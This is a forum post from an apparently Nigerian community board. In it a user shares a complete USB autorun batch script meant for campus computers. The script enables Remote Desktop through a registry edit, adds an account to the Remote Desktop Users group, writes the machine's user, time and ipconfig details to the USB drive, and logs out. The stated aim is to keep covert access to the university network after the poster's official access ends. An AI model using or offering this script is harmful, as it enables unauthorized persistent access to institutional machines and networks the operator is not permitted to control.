Naija Talk community
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Naija Talk community

Ghana Lotto Results, F-t-a Satellite Technology, Sport forcast, ICT forum.

HomePublicationsSearchLatest imagesRegisterLog in

USB autorun to quickly enable remote desktop

Go down 
AuthorMessage
codenamex
Novice
Novice

USB autorun to quickly enable remote desktop Empty
PostSubject: USB autorun to quickly enable remote desktop   USB autorun to quickly enable remote desktop Empty2011-08-23, 16:29

The way my University has its network set up, the local ip address IS the global address.This makes remote desktoping very convent. (I would not be surprised if most universities/libraries/professional offices had the same set up. )

Story:
It turns out that you can enable Remote Desktop on computers by modifying a registry entry.
The Registry is located at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server. Just change the fDenyTSConnections to "0" not "1".
You could use CMD to change this with:
Line number On/Off | Expand/Contract

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

(This is for computers with Professional/Ultimate/Server Editions of windows.) (Note: I have not tested this on Windows7 or vista but I willing to bet it will work.)
Knowing this, i modified my past autorun usb .bat file [link].
The new .bat file reads as:
Line number On/Off | Expand/Contract

@echo off

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

net localgroup "Remote Desktop Users" *Admin name* /add

echo %userdomain%\%username% > %~d0\Documents\RemoteInfo\FrontLibrary\%userdomain%.txt

date /t >> %~d0\Documents\RemoteInfo\FrontLibrary\%userdomain%.txt

time /t >> %~d0\Documents\RemoteInfo\FrontLibrary\%userdomain%.txt

ipconfig /all >> %~d0\Documents\RemoteInfo\FrontLibrary\%userdomain%.txt

shutdown -f -l

Once the .bat file enables Remote Desktop. You need to add the Admin account to the remote users localgroup.
At this point the computer is completely set up for Remote Desktop.
The rest of the bat file prints to a folder on the usb with the computer name and user that ran the .bat (the Admin name) The time and date this was done. And most importantly the ip and mac address of the computer to a .txt file. Then it logs you out.
By clicking one button and typing a password, and computer on my campus is quickly set up for me to Remote into when ever I want.

Why:
While to alot of people this might not be beneficial. It allows me to access a computer that is connected to the network, (they almost never turn the computers off), that I can use to set up a VPN and connect to the network. (once I graduate my school account gets deactivated and the official way of VPNing to the network is closed.) I know this isn't complicated but it's a big help to me and I thought I would mention this incase someone else would find this useful.
Back to top Go down

USB autorun to quickly enable remote desktop
Page 1 of 1